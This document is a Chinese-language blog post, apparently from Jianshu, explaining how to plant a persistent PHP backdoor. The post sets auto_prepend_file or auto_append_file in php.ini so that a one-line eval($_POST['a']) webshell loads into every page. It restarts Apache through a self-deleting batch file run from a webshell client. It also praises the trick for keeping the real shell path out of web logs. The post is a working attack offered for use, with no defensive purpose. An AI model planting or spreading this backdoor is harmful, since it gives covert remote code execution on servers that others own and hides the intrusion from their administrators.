php.ini另類后門

php.ini文件:
auto_prepend_file="c:/phpstudy/www/shell.php"      #也可以是 gif、jpg文件等
或auto_append_file=shell1.php
include_path="c:\phpstudy\www;."       
(include_path = ";."   也可以和上面一樣的效果)
(include_path = "c:\;."   也可以和上面一樣的效果)
(include_path = "d:\;."   也可以和上面一樣的效果)
(include_path = ".;c:\php\includes"   也可以和上面一樣的效果)
(include_path = ";c:\"   也可以和上面一樣的效果)
(;include_path = ".;c:\php\includes"   也可以和上面一樣的效果)
這說明php.ini另類后門與這個include_path可以無關
cmd 重啟apache服務,我的是phpstudy,所以是apache2a服務
net stop apache2a && net start apache2a

也可以編輯1.bat:
net stop apache2a && net start apache2a && del %~dp01.bat
# %~dp0 表示 '\當前路徑\'               %~dp01.bat  表示  \當前路徑\1.bat
c:\1.bat   回車(假如1.bat 在c:\ 下)
在菜刀下,權限夠的情況下:等一會兒,出現Run command [1.bat] failed!
但實際上已經成功,你  dir  c:\
發(fā)現c:\1.bat 沒了

也可以這樣編輯1.bat,效果一樣:
net stop apache2a 
net start apache2a
del %~dp01.bat

附后門文件內容:<?php !empty($_POST['a'])?EvAL($_POST['a']):false;>?

注意:一定等出現Run command [1.bat] failed!,再關閉菜刀cmd窗口

利用php.ini的另類后門

下面這句不知對不對:
include_path = “.;c:\php\includes” 前面的 “.”代表/目錄,而”;”后面的目錄代表Automatically add files(自動添加)所有include文件的目錄

這種方法尤其值得推崇的地方是:服務器web日志中記錄的連接文件是你菜刀url中的文件地址,而不是你真正的shell 一句話地址(假如你菜刀url中鏈接的文件是在網站中隨意的有效文件,而非一句話shell文件)

因為auto_prepend_file 會在所有的php頂部加載文件
而auto_append_file 會在所有頁面底部加載文件,相當于 require shell 一句話文件

最后編輯于
?著作權歸作者所有,轉載或內容合作請聯系作者
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發(fā)布,文章內容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務。

推薦閱讀更多精彩內容

  • 架構師必須知道的26項PHP安全實踐 PHP是一種開源服務器端腳本語言,應用很廣泛。Apache web服務器提供...
    meng_philip123閱讀 6,117評論 1 161
  • 更改ip和dnsVi /etc/sysconfig/network-scripts/ifcfg-eth0vi /...
    Xwei_閱讀 1,854評論 0 3
  • 一、什么才是”遠程文件包含漏洞”? 回答是:服務器通過php的特性(函數)去包含任意文件時,由于要包含的這個文件來...
    喜歡吃栗子閱讀 2,681評論 1 4
  • Composer Repositories Composer源 Firegento - Magento模塊Comp...
    零一間閱讀 3,969評論 1 66
  • 喬布斯、沃茲、惠恩是三個非常熱愛電腦的年輕人。1976年的一天,他們簽署了一份合同,成立了一家電腦公司,公司取名“...
    江蘇葦笛閱讀 412評論 1 4